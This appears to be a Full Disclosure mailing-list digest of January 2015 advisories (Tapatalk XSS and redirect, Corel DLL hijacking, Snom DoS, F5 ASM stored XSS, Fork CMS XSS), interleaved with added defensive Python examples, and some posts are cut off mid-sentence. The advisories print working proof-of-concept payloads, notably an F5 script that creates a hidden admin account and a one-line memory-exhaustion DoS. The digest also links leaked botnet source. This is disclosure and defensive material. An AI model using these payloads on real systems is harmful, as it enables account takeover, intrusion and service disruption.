[FD] [RT-SA-2014-015] Cross-site Scripting in Tapatalk Plugin for WoltLab Burning Board 4.0

2015-01-12 Thread RedTeam Pentesting GmbH
Advisory: Cross-site Scripting in Tapatalk Plugin for WoltLab Burning Board 4.0

RedTeam Pentesting discovered a cross-site scripting (XSS) vulnerability
in the Tapatalk plugin for the WoltLab Burning Board forum software,
which allows attackers to inject arbitrary JavaScript code via URL
parameters.


Details
=======

Product: Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0
Affected Versions: <= 1.0.0
Fixed Versions: 1.1.2
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://tapatalk.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-015
Advisory Status: published
CVE: CVE-2014-8869
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8869


Introduction
============

Tapatalk is an app built for interacting with discussion forums on
mobile devices. It differs from a forum’s mobile web skin in that it
offers the speed of a native app and a streamlined unified interface for
every forum a user subscribes to. Tapatalk also creates a unique
eco-system that allows forums to be searched and discovered by millions
of Tapatalk users which in turn promotes content, new memberships, and
interactions.

(from Tapatalk's Homepage)


More Details
============

The Tapatalk extension includes the PHP script welcome.php at the path

com.tapatalk.wbb4/files/mobiquo/smartbanner/welcome.php

which is accessible via the URL

http://www.example.com/mobiquo/smartbanner/welcome.php

on systems using the plugin. It outputs JavaScript code that includes
improperly encoded values from the two URL parameters app_android_id
and app_kindle_url. Depending on which parameter is used, one of
their values is assigned to the PHP variable $byo:


<?php
[...]
else if (isset($_GET['app_android_id']))
{
  $app_android_id = $_GET['app_android_id'];
  if ($app_android_id && $app_android_id != '-1')
    $byo = "&app_android_id=$app_android_id";
}
else if (isset($_GET['app_kindle_url']))
{
  $app_kindle_url = $_GET['app_kindle_url'];
  if ($app_kindle_url && $app_kindle_url != '-1')
    $byo = "&app_kindle_url=$app_kindle_url";
}


Later the $byo variable is used to build a URL without URL encoding it
and the URL is used without further encoding in a script element:


<?php
[...]
$ads_url = $protocol.'tapatalk.com/welcome_screen.php'
.'?referer='.urlencode($referer)
.'&code='.urlencode($code)
.'&board_url='.urlencode($board_url)
.'&lang='.urlencode($lang)
.$byo
.'&callback=?';
[...]
?>
[...]

<script>$.getJSON("<?php echo $ads_url; ?>",function(data){
[...]



Proof of Concept
================

The following URL can be used to demonstrate the vulnerability:

http://www.example.com/mobiquo/smartbanner/welcome.php
  ?app_kindle_url=");alert('RedTeam Pentesting');</script><!--

The result is a notification showing the text RedTeam Pentesting.


Workaround
==========

The PHP function urlencode() should be used to encode the $byo variable
before building a URL with it.


Fix
===

Update the plugin to version 1.1.2.


Security Risk
=============

This security vulnerability is rated as a high risk. It allows the
execution of arbitrary JavaScript code in users' browsers if they access URLs
prepared by attackers. This provides many different possibilities for
further attacks against these users. Since the plugin is used for a
bulletin board, the vulnerability could be exploited to display a fake
login page and obtain credentials from users or administrators. The
vulnerability also affects other web applications hosted on the same
domain.


Timeline
========

2014-10-20 Vulnerability identified
2014-10-29 CVE number requested
2014-11-14 CVE number assigned
2014-11-26 Vendor notified via https://tapatalk.com/security.php
2014-12-16 Vendor notified again, received reply from vendor
2014-12-16 Vulnerability patched in SCM [0]
2014-12-23 Updated plugin released by vendor [1]
2015-01-08 Vendor updated release notes to mention XSS [2]
2015-01-12 Advisory released


References
==========

[0] https://github.com/tapatalk/tapatalk-wbb/commit/71024545904024cea9d04a887fdc64b9a9b85871
[1] https://github.com/tapatalk/tapatalk-wbb/commit/31472f6fcfffacd698b0c20809c4a8fb3c4f32f9
[2] https://support.tapatalk.com/threads/19540/#post-146253


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in

[FD] CVE-2014-8870: Arbitrary Redirect in Tapatalk Plugin for WoltLab Burning Board 4.0

2015-01-12 Thread RedTeam Pentesting GmbH
The Tapatalk Plugin com.tapatalk.wbb4 for WoltLab Burning Board 4.0 prior to
version 1.1.2 allowed to redirect users to arbitrary URLs. This was possible by
specifying the target URL in the URL parameter board_url in URLs like the
following:

http://www.example.com/mobiquo/smartbanner/welcome.php?board_url=https://www.redteam-pentesting.de

CVE-2014-8870 was assigned to this issue.

-- 
RedTeam Pentesting GmbH   Tel.: +49 241 510081-0
Dennewartstr. 25-27       Fax : +49 241 510081-99
52068 Aachen              https://www.redteam-pentesting.de
Germany                   Registergericht: Aachen HRB 14004
Geschäftsführer:          Patrick Hof, Jens Liebchen



___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
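An added example, not part of the advisory or of the Tapatalk plugin, showing how a board_url-style redirect parameter can be validated before the redirect is issued. The allowlisted hosts and the default target are constructed for the example; the checks cover the usual ways an open-redirect filter gets bypassed (scheme-relative URLs, non-http schemes, userinfo in the authority, backslashes, alternate ports).

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed allowlist: hosts this forum installation may send users to.
ALLOWED_HOSTS = {"www.example.com", "forum.example.com"}
DEFAULT_TARGET = "https://www.example.com/"


def safe_redirect_target(board_url, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_TARGET):
    """Return board_url if it points at an allowed host, otherwise `default`.

    The comparison is done on the whole netloc, so 'allowed@evil.example'
    (userinfo trick) and 'allowed:8443' (alternate port) both fail. Scheme-
    relative '//evil.example' has no scheme and fails the scheme check;
    backslashes are rejected outright because browsers treat them as slashes
    while urlsplit does not.
    """
    if board_url is None:
        return default
    candidate = board_url.strip()
    if any(c in candidate for c in "\\\t\n\r\x00"):
        return default
    parts = urlsplit(candidate)
    if parts.scheme not in ("http", "https"):        # also rejects javascript:, data:, ''
        return default
    if parts.netloc.lower() not in allowed_hosts:
        return default
    # Rebuild from validated components only; the fragment is dropped.
    return urlunsplit((parts.scheme, parts.netloc.lower(), parts.path or "/", parts.query, ""))


if __name__ == "__main__":
    for sample in ("https://www.example.com/thread/1",
                   "https://www.redteam-pentesting.de",   # the advisory's demonstration target
                   "//evil.example/x",
                   "javascript:alert(1)",
                   "https://www.example.com@evil.example/"):
        print(repr(sample), "->", safe_redirect_target(sample))
```

Validating and rebuilding the URL is preferable to a prefix check such as `startswith("https://www.example.com")`, which the userinfo form above defeats.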

[FD] Corel Software DLL Hijacking

2015-01-12 Thread CORE Advisories Team
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Corel Software DLL Hijacking



1. *Advisory Information*

Title: Corel Software DLL Hijacking
Advisory ID: CORE-2015-0001
Advisory URL:
http://www.coresecurity.com/advisories/corel-software-dll-hijacking
Date published: 2015-01-12
Date of last update: 2015-01-06
Vendors contacted: Corel
Release mode: User release



2. *Vulnerability Information*

Class: Uncontrolled Search Path Element [CWE-427]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-8393, CVE-2014-8394, CVE-2014-8395, CVE-2014-8396,
CVE-2014-8397, CVE-2014-8398



3. *Vulnerability Description*


Corel [1] has developed a wide range of products that includes graphics,
painting, photo, video and office software (CorelDRAW, Corel Photo-Paint,
Corel PaintShop Pro, Corel CAD, Corel Painter, Corel PDF Fusion, Corel
VideoStudio and Corel FastFlick among others).



When a file associated with the Corel software is opened, the directory of
that document is first used to locate DLLs, which could allow an attacker to
execute arbitrary commands by inserting malicious DLLs into the same
directory as the document.



4. *Vulnerable packages*

   . Corel DRAW X7 [2]
   . Corel Photo-Paint X7 [3]
   . Corel PaintShop Pro X7 [7]
   . Corel CAD 2014 [4]
   . Corel Painter 2015 [5]
   . Corel PDF Fusion [6]
   . Corel VideoStudio PRO X7 [8]
   . Corel FastFlick [9]

Other versions could be affected too, but they were not checked.


5. *Vendor Information, Solutions and Workarounds*


Given that this is a client-side vulnerability, affected users should avoid
opening untrusted files whose extensions are associated with Corel software
and contain any of the DLL files detailed below.


6. *Credits*


This vulnerability was discovered and researched by Marcos Accossatto from
Core Security Exploit Writers Team. The publication of this advisory was
coordinated by Joaquin Rodriguez Varela from Core Advisories Team.



7. *Technical Description / Proof of Concept Code*

[CVE-2014-8393] This vulnerability is caused by a DLL Hijacking when a file
associated with any of the following Corel applications is executed
(CorelDRAW X7, Corel Photo-Paint X7, Corel PaintShop Pro X7, Corel Painter
2015 or Corel PDF Fusion). The affected application should not be running
for the vulnerability to work. The Corel software looks for a DLL file
called wintab32.dll and does not control its path, therefore allowing to
copy a malicious DLL file with the same name inside the folder where the
associated file is. The DLL is executed within the context of the
application.


[CVE-2014-8394] This vulnerability is caused by a DLL Hijacking when a file
associated with Corel CAD 2014 is executed. Corel CAD 2014 should not be
running before the associated file is executed for the vulnerability to
work. Corel CAD looks for a DLL file called FxManagedCommands_3.08_9.tx or
TD_Mgd_3.08_9.dll and does not control their path, therefore allowing to
copy a malicious DLL file with the same name of either DLL inside the
folder where the associated file is. The DLL is executed within the context
of the application.


[CVE-2014-8395] This vulnerability is caused by a DLL Hijacking when a file
associated with Corel Painter 2015 is executed. Corel Painter 2015 should
not be running before the associated file is executed for the vulnerability
to work. Corel Painter looks for a DLL file called wacommt.dll and does not
control its path, therefore allowing to copy a malicious DLL file with the
same name inside the folder where the associated file is. The DLL is
executed within the context of the application.


[CVE-2014-8396] This vulnerability is caused by a DLL Hijacking when a file
associated with Corel PDF Fusion is executed. Corel PDF Fusion should not be
running before the associated file is executed for the vulnerability to
work. Corel PDF Fusion looks for a DLL file called quserex.dll and does not
control its path, therefore allowing to copy a malicious DLL file with the
same name inside the folder where the associated file is. The DLL is
executed within the context of the application.


[CVE-2014-8397] This vulnerability is caused by a DLL Hijacking when a file
associated with Corel VideoStudio PRO X7 or Corel FastFlick is executed.
Corel VideoStudio or Corel FastFlick should not be running before the
associated file is executed for the vulnerability to work. Corel PDF Fusion
looks for a DLL file called u32ZLib.dll and does not control its path,
therefore allowing to copy a malicious DLL file with the same name inside
the folder where the associated file is. The DLL is executed within the
context of the application.


[CVE-2014-8398] This vulnerability is caused by a DLL Hijacking when a file
associated with Corel FastFlick is executed. Corel FastFlick should not be
running before the associated file is executed
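The workaround in section 5 asks users to check whether a document's directory also contains one of the listed DLLs. An added Python example, not from the advisory or from Corel, that automates that check over a directory tree: it reports every file carrying one of the six loader names named in section 7 and lists the documents sitting beside it. The document extension list and the fixture directories are assumptions made for the example; the loader names are the ones from the advisory.

```python
import os
import tempfile

# Loader names taken from the advisory text (CVE-2014-8393 .. CVE-2014-8398),
# lower-cased because NTFS name lookups are case-insensitive.
HIJACK_NAMES = {
    "wintab32.dll",
    "fxmanagedcommands_3.08_9.tx",
    "td_mgd_3.08_9.dll",
    "wacommt.dll",
    "quserex.dll",
    "u32zlib.dll",
}

# Extensions treated as "documents opened by Corel software". This list is an
# assumption for the example; the advisory does not enumerate extensions.
DOCUMENT_EXTENSIONS = {".cdr", ".cpt", ".pspimage", ".dwg", ".rif", ".pdf", ".vsp"}


def scan_tree(root):
    """Walk `root` and return sorted (library_path, co_located_documents) pairs
    for every file whose name matches one of HIJACK_NAMES.

    A hit next to a document is exactly the pattern the advisory describes
    (document directory searched before the application's own). A hit with
    no document beside it is still reported: such a file has no business
    anywhere outside the application's install directory.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        by_lower = {name.lower(): name for name in filenames}
        hits = sorted(by_lower[n] for n in HIJACK_NAMES if n in by_lower)
        if not hits:
            continue
        documents = sorted(
            os.path.join(dirpath, name)
            for name in filenames
            if os.path.splitext(name)[1].lower() in DOCUMENT_EXTENSIONS
        )
        for name in hits:
            findings.append((os.path.join(dirpath, name), documents))
    return sorted(findings)


def build_fixture():
    """Create a constructed directory tree for a stand-alone run: one folder
    with a drawing and a planted wintab32.dll, one clean folder, and one
    folder holding only a mixed-case QUserEx.dll."""
    root = tempfile.mkdtemp(prefix="corel-scan-")
    layout = {
        os.path.join("downloads", "brochure"): ["brochure.cdr", "wintab32.dll", "readme.txt"],
        "documents": ["notes.cdr"],
        "tools": ["QUserEx.dll"],
    }
    for rel, names in layout.items():
        folder = os.path.join(root, rel)
        os.makedirs(folder)
        for name in names:
            with open(os.path.join(folder, name), "wb"):
                pass
    return root


if __name__ == "__main__":
    for library, documents in scan_tree(build_fixture()):
        print(library, "-> co-located documents:", documents or "none")
```

Run it against a download or mail-attachment directory rather than the whole disk; the application's own installation directory legitimately contains some of these names and would only add noise.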


[FD] Snom SIP phones denial of service through HTTP

2015-01-12 Thread kape...@googlemail.com
Snom SIP phones (www.snom.com) have a builtin HTTP/HTTPS configuration
interface, which is enabled by default.

By making a single HTTP POST request all available memory (and CPU) can be
exhausted, resulting in a reboot of the phone.
This even works if the HTTP/HTTPS interface is protected by username and
password (probably the credentials are checked a few more lines later when
the complete request has been received).

Affected models: MP, 3XX, 7XX, 8XX (I didn't have any of the other models to
test)
Affected firmwares: latest stable, latest beta (most likely some others too)
Workaround: Disable HTTP/HTTPS interface completely.

Poc:

dd if=/dev/zero bs=1M count=32 | curl http://IP_OF_PHONE/ --data-binary @-

P.S. Just if you are wondering: I did not notify the vendor about this.
Almost two years ago I reported multiple vulnerabilities directly to the
vendor (including the possibility to install arbitrary software on the
device), but not much has changed since then.

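The defensive counterpart to the behaviour described above (a large POST body buffered in full before the credentials are checked), as an added Python example that is not from the post and not from Snom firmware: a request handler that reads only the request head, checks authorization and Content-Length, and refuses oversized or unauthenticated bodies before buffering a single body byte. The size limits and the credential are constructed for the example.

```python
import io

# Hypothetical limits for a small embedded configuration UI; these are
# assumptions for the example, not values taken from any Snom firmware.
MAX_HEAD_BYTES = 8 * 1024
MAX_BODY_BYTES = 64 * 1024


def read_head(stream, max_bytes=MAX_HEAD_BYTES):
    """Read only the request line and headers from a socket-like stream.

    Returns (method, path, headers, leftover) or None if the head is
    malformed or exceeds max_bytes. `leftover` holds body bytes that arrived
    in the same chunk as the head; they are handed on, not discarded.
    """
    buf = b""
    while b"\r\n\r\n" not in buf:
        if len(buf) >= max_bytes:
            return None
        chunk = stream.read(1024)
        if not chunk:
            return None
        buf += chunk
    head, _, leftover = buf.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            return None
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers, leftover


def handle_request(stream, is_authorized, limit=MAX_BODY_BYTES):
    """Return (status, body). Credentials and Content-Length are checked
    before any body byte is read, so an oversized or unauthenticated POST is
    never buffered."""
    head = read_head(stream)
    if head is None:
        return 400, b""
    _method, _path, headers, leftover = head
    if not is_authorized(headers):
        return 401, b""          # reject before touching the body
    if "transfer-encoding" in headers:
        return 411, b""          # no unbounded chunked bodies on this endpoint
    try:
        length = int(headers.get("content-length", "0"))
    except ValueError:
        return 400, b""
    if length < 0:
        return 400, b""
    if length > limit:
        return 413, b""          # refuse before allocating anything
    body = leftover[:length]
    while len(body) < length:
        chunk = stream.read(min(4096, length - len(body)))
        if not chunk:
            return 400, b""      # client went away mid-body
        body += chunk
    return 200, body


def demo_authorized(headers):
    """Constructed credential check standing in for the phone's HTTP auth."""
    return headers.get("authorization") == "Basic YWRtaW46ZXhhbXBsZQ=="  # admin:example


def handle_bytes(raw, is_authorized=demo_authorized):
    """Convenience wrapper: run handle_request over an in-memory request."""
    return handle_request(io.BytesIO(raw), is_authorized)


# Constructed requests: the advisory's oversized POST, a normal one, and an
# oversized one without credentials.
OVERSIZED = (b"POST / HTTP/1.1\r\nHost: phone\r\n"
             b"Authorization: Basic YWRtaW46ZXhhbXBsZQ==\r\n"
             b"Content-Length: 33554432\r\n\r\n") + b"\x00" * 512
NORMAL = (b"POST /settings HTTP/1.1\r\nHost: phone\r\n"
          b"Authorization: Basic YWRtaW46ZXhhbXBsZQ==\r\n"
          b"Content-Length: 11\r\n\r\nname=office")
NO_AUTH = b"POST / HTTP/1.1\r\nHost: phone\r\nContent-Length: 33554432\r\n\r\n"

if __name__ == "__main__":
    for raw in (OVERSIZED, NORMAL, NO_AUTH):
        print(handle_bytes(raw))
```

The order of the checks is the point: a limit that is enforced only after the body has been read, or an authentication check that runs after the request is complete, still lets an unauthenticated client force the allocation.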


[FD] Stored XSS Vulnerability in F5 BIG-IP Application Security Manager

2015-01-12 Thread Peter Lapp
Details
=======

Product: F5 BIG-IP Application Security Manager (ASM)
Vulnerability: Cross Site Scripting
Author: Peter Lapp, lapp...@gmail.com
CVE: None assigned
Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Likely 11.4.x-11.5.x.
Fixed Version: 11.6



Summary
=======

The F5 ASM is a web application firewall designed to protect web
applications from attacks. It allows for a custom HTML page to be displayed
to end users when they trigger a violation. The configuration page for the
custom response contains a text input for HTML and a Show button that
allows the editor to preview the page. This functionality is vulnerable to
Cross Site Scripting.



Technical Details and POC
=========================

The HTML entered into the Response Body area is not sandboxed, which
allows a malicious user to include JavaScript that would run in the context
of the management console whenever a user clicks the Show button. The
user could use XHR to bypass CSRF protections and perform commands on
behalf of anyone that clicks the Show button.

Scenario:

1. A restricted user (Application Security Editor role) logs into the
management console of the ASM, enters Javascript to add a new user (see
below) into the Response Body input, and saves the page.

2. An admin logs on and previews the block page via the Show button.

3. The JS runs in the background, executes the XHR, and adds a new admin
user. The restricted user now has an admin account.

POC (Sloppy, I know):
<script>
var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4)
{
var postrequest = new XMLHttpRequest();
xmlForm = xmlhttp.responseXML.getElementById('myform');
var timenowvalue = encodeURIComponent(xmlForm.elements['_timenow'].value);
var timebeforevalue = encodeURIComponent(xmlForm.elements['_timenow_before'].value);
var bufvalue = encodeURIComponent(xmlForm.elements['_bufvalue'].value);
var bufvaluebefore = encodeURIComponent(xmlForm.elements['_bufvalue_before'].value);
var parameters = "_timenow="+timenowvalue+"&_timenow_before="+timebeforevalue+"&_bufvalue="+bufvalue+"&_bufvalue_before="+bufvaluebefore+"&_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Fuser%2Fcreate&handler_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate&showObjList=shell_with_bash&showObjList_before=&hideObjList=partition_row%2Cshell_no_bash&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Fuser%2Fcreate&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate&linked_add_id=&linked_add_id_before=&exit_page=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&exit_page_before=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&user_role_before=900&user_role_before_before=900&form_page=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&name=testadmin&name_before=&name_validation=NO_VALIDATION&name_required=1&passwd=testing123&passwd_before=&passwd_validation=com.f5.form.PasswordValidator&passwd_validationparam1=passwd_confirm&passwd_required=1&passwd_confirm=testing123&passwd_confirm_before=&passwd_confirm_validation=NO_VALIDATION&passwd_confirm_required=1&user_role=0&user_role_before=900&shell_with_bash=bash&shell_with_bash_before=disable&exit_button_before=Cancel&repeat_before=Repeat&finished=Finished&finished_before=Finished";
postrequest.open("POST", "/tmui/Control/form", true)
postrequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
postrequest.send(parameters)
}
}
xmlhttp.open("GET", "/tmui/Control/jspmap/tmui/system/user/create.jsp", true);
xmlhttp.responseType = "document";
xmlhttp.send();
</script>



Solution
========

Upgrade to 11.6.
The vendor indicated the patch would not be backported to previous versions.


Timeline
========

06/09/14 - Reported issue to vendor
06/18/14 - Vendor confirms the vulnerability
07/18/14 - Vendor confirms the fix will be included in 11.6 and an SOL
would be created for the vulnerability
10/24/14 - Vendor confirms the fix was included in 11.6.0 but an SOL was
not created and the fix would not be backported.
01/12/14 - Released vulnerability info.

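An added Python example, not from the post and not from F5, showing what "sandboxed" means for a preview feature like the one described above: the untrusted block page is rendered in an iframe with an empty sandbox attribute, or served from its own endpoint under a sandboxing Content-Security-Policy. Either way the content gets an opaque origin and no script execution, so an XHR against the management console from inside the preview is neither same-origin nor possible. The sample block page is constructed.

```python
import html

# Constructed block page as an Application Security Editor might save it.
UNTRUSTED_BLOCK_PAGE = '<h1>Request blocked</h1><script>alert("xss")</script>'


def preview_page(untrusted_html):
    """Render the editor-supplied HTML for preview inside a sandboxed iframe.

    An empty sandbox attribute (no allow-scripts, no allow-same-origin)
    gives the content an opaque origin and forbids script execution. The
    markup is placed in the srcdoc attribute, which needs attribute
    encoding: html.escape(quote=True) turns '"' into &quot; and '<' into
    &lt;, so the untrusted page cannot terminate the attribute or the tag.
    """
    srcdoc = html.escape(untrusted_html, quote=True)
    return (
        '<!doctype html><title>Response preview</title>'
        '<iframe sandbox="" referrerpolicy="no-referrer" srcdoc="%s"></iframe>' % srcdoc
    )


def preview_response(untrusted_html):
    """Alternative for a dedicated preview endpoint: serve the HTML unchanged
    but under a sandboxing CSP, which applies the same restrictions as the
    iframe attribute without needing an embedding page."""
    headers = [
        ("Content-Type", "text/html; charset=utf-8"),
        ("Content-Security-Policy",
         "sandbox; default-src 'none'; style-src 'unsafe-inline'; img-src data:"),
        ("X-Content-Type-Options", "nosniff"),
        ("Cache-Control", "no-store"),
    ]
    return 200, headers, untrusted_html.encode("utf-8")


def csp_forbids_scripts(headers):
    """Check that a response's CSP sandboxes the document without re-enabling
    scripts; useful as a regression test for the preview endpoint."""
    policy = dict(headers).get("Content-Security-Policy", "")
    directives = {d.strip().split(" ")[0] for d in policy.split(";") if d.strip()}
    return "sandbox" in directives and "allow-scripts" not in policy


if __name__ == "__main__":
    print(preview_page(UNTRUSTED_BLOCK_PAGE))
    status, headers, _body = preview_response(UNTRUSTED_BLOCK_PAGE)
    print(status, csp_forbids_scripts(headers))
```

Of the two, the CSP variant is easier to retrofit to an existing "Show" endpoint, since the page that is already served only needs the extra header; the iframe variant is the right shape when the preview is embedded inside another console page.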


[FD] Lizard Stresser rekt

2015-01-12 Thread Robert Cavanaugh
Hi FD,

I'm sure you're all sick to death of hearing about Lizard Squad and the
skid marks they're leaving all over the place, so we'll make this brief:
Lizard Squad has been rekt and the source code for their bots is now
available for your viewing pleasure.

https://github.com/pop-pop-ret/lizkebab

0wned by: Chippy1337, @packetprophet

If you lulz'd, send BTC to 129UQoB3JvZg3iDERYZiXeHPkwT1iJF8u4
https://blockchain.info/address/129UQoB3JvZg3iDERYZiXeHPkwT1iJF8u4



[FD] XSS Vulnerability in Fork CMS 3.8.3

2015-01-12 Thread ITAS Team
# Exploit Title: XSS Vulnerability in Fork CMS 3.8.3
# Google Dork: N/A
# Date: 12/26/2014
# Exploit Author: Le Ngoc phi (phi.n...@itas.vn) and ITAS Team (www.itas.vn)
# Vendor Homepage: http://www.fork-cms.com
# Software Link: http://www.fork-cms.com/blog/detail/fork-3.8.4-released
# Version: Fork 3.8.3
# Tested on: N/A
# CVE : CVE-2014-9470

::VULNERABILITY DETAIL::

- Vulnerable parameter: q_widget
- Vulnerable file: src/Frontend/Modules/Search/Actions/Index.php
- Vulnerable function: loadForm()

- Attack vector:

GET /en/search?form=search&q_widget="onmouseover="alert('XSS')&submit=Search HTTP/1.1
Host: forkcms.local
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; __utma=23748525.1232410121.1415937482.1419392332.1419480017.3; __utmz=23748525.1419480017.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; frontend_language=s%3A2%3A%22en%22%3B; _ga=GA1.2.1232410121.1415937482; PHPSESSID=gailpg881ubvtsmroh2p1bfqn5
Connection: keep-alive


- Vulnerable code:

private function loadForm()
{
    // create form
    $this->frm = new FrontendForm('search', null, 'get', null, false);

    // could also have been submitted by our widget
    if (!\SpoonFilter::getGetValue('q', null, '')) {
        $_GET['q'] = \SpoonFilter::getGetValue('q_widget', null, '');
    }

    // create elements
    $this->frm->addText(
        'q',
        null,
        255,
        'inputText liveSuggest autoComplete',
        'inputTextError liveSuggest autoComplete'
    );

    // since we know the term just here we should set the canonical url here
    $canonicalUrl = SITE_URL . FrontendNavigation::getURLForBlock('Search');
    if (isset($_GET['q']) && $_GET['q'] != '') {
        $canonicalUrl .= '?q=' . $_GET['q'];
    }
    $this->header->setCanonicalUrl($canonicalUrl);
}


::DISCLOSURE::

- 12/25/2014: Detected vulnerability
- 12/25/2014: Inform vendor and the vendor confirmed
- 12/26/2014: Vendor releases patch
- 12/26/2014: ITAS Team publishes information

::REFERENCE::

- http://www.itas.vn/news/itas-team-found-out-a-cross-site-scripting-vulnerability-in-fork-cms-70.html
- https://github.com/forkcms/forkcms/issues/1018s
- https://github.com/forkcms/forkcms/commit/4a7814762adf4f56f932d95146c7e4126d872114


::DISCLAIMER::

THE INFORMATION PRESENTED HEREIN IS PROVIDED "AS IS" WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE AS IS, AND AT THE
USER'S OWN RISK.





ITAS Team

ITAS Corp.  Be protected with us
Office : 24 Dang Thai Mai St., Ward 7, Phu Nhuan District, HCMC.
Tel : +84 - 8 - 38931952   Hotline : 0903445711
Email : i...@itas.vn
http://www.itas.vn/

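This post (Fork CMS, where $_GET['q'] is concatenated into the canonical URL) and the Tapatalk advisory earlier in this digest (where $byo is appended to $ads_url without urlencode()) share the same two missing encoding steps. As an added Python example that belongs to neither project: the query string is first built with urlencode(), and the resulting URL is then encoded for the sink it lands in, a JS string literal inside <script> for Tapatalk and an HTML attribute for Fork CMS. The site URLs and the two payload strings are constructed; the URL shapes are simplified mirrors of the PHP shown in the two posts.

```python
import html
import json
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed inputs shaped like the two advisories' injection points.
PAYLOAD_JS = "\");alert('RedTeam Pentesting');</script><!--"   # Tapatalk PoC shape
PAYLOAD_ATTR = "\" onmouseover=\"alert('XSS')"                  # Fork CMS shape


def ads_url_vulnerable(board_url, lang, app_kindle_url):
    """Mirror of welcome.php before the fix: $byo is appended without urlencode()."""
    byo = ""
    if app_kindle_url and app_kindle_url != "-1":
        byo = "&app_kindle_url=" + app_kindle_url
    return ("https://tapatalk.com/welcome_screen.php?"
            + urlencode({"board_url": board_url, "lang": lang}) + byo + "&callback=?")


def ads_url_fixed(board_url, lang, app_kindle_url):
    """Same URL with the optional parameter encoded like every other one."""
    params = {"board_url": board_url, "lang": lang}
    if app_kindle_url and app_kindle_url != "-1":
        params["app_kindle_url"] = app_kindle_url
    return "https://tapatalk.com/welcome_screen.php?" + urlencode(params) + "&callback=?"


def js_string_literal(value):
    """Encode a value as a JS string literal for use inside an inline <script>.
    json.dumps escapes quotes and backslashes; '</' is split so the HTML
    parser cannot find a closing </script> inside the literal; U+2028/2029
    are line terminators in older JS engines and are escaped too."""
    return (json.dumps(value)
            .replace("</", "<\\/")
            .replace("\u2028", "\\u2028")
            .replace("\u2029", "\\u2029"))


def render_getjson_script(url):
    """The welcome.php sink, with the URL emitted through js_string_literal()."""
    return "<script>$.getJSON(" + js_string_literal(url) + ", function(data) {});</script>"


def canonical_url_vulnerable(site_url, q):
    """Mirror of loadForm() before the fix: raw $_GET['q'] concatenated."""
    return site_url + "/en/search" + ("?q=" + q if q else "")


def canonical_url_fixed(site_url, q):
    """Same canonical URL with the query built by urlencode()."""
    return site_url + "/en/search" + ("?" + urlencode({"q": q}) if q else "")


def render_canonical_link(url):
    """The <link rel="canonical"> sink, attribute-encoded with html.escape()."""
    return '<link rel="canonical" href="%s">' % html.escape(url, quote=True)


def decode_param(url, name):
    """Decode one query parameter the way the receiving side will see it."""
    return parse_qs(urlsplit(url).query)[name][0]


if __name__ == "__main__":
    print(ads_url_vulnerable("https://forum.example", "en", PAYLOAD_JS))
    print(ads_url_fixed("https://forum.example", "en", PAYLOAD_JS))
    print(render_getjson_script(ads_url_fixed("https://forum.example", "en", PAYLOAD_JS)))
    print(render_canonical_link(canonical_url_fixed("http://forkcms.local", PAYLOAD_ATTR)))
```

The two layers are independent: urlencode() keeps the parameter value intact for the receiving script (decode_param() recovers it exactly), while the sink encoding keeps the page's own markup and script intact even if a raw value does slip through. Fixing only the sink would have been enough to stop both reported payloads, but a URL with unencoded '&' or '#' in the value is still a wrong URL, so both steps belong in the fix.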



[FD] [Corrected] Stored XSS Vulnerability in F5 BIG-IP Application Security Manager

2015-01-12 Thread Peter Lapp
Edit: Corrected the date in the timeline from 01/12/14 to 01/12/15.



Details
===

Product: F5 BIG-IP Application Security Manager (ASM)
Vulnerability: Cross Site Scripting
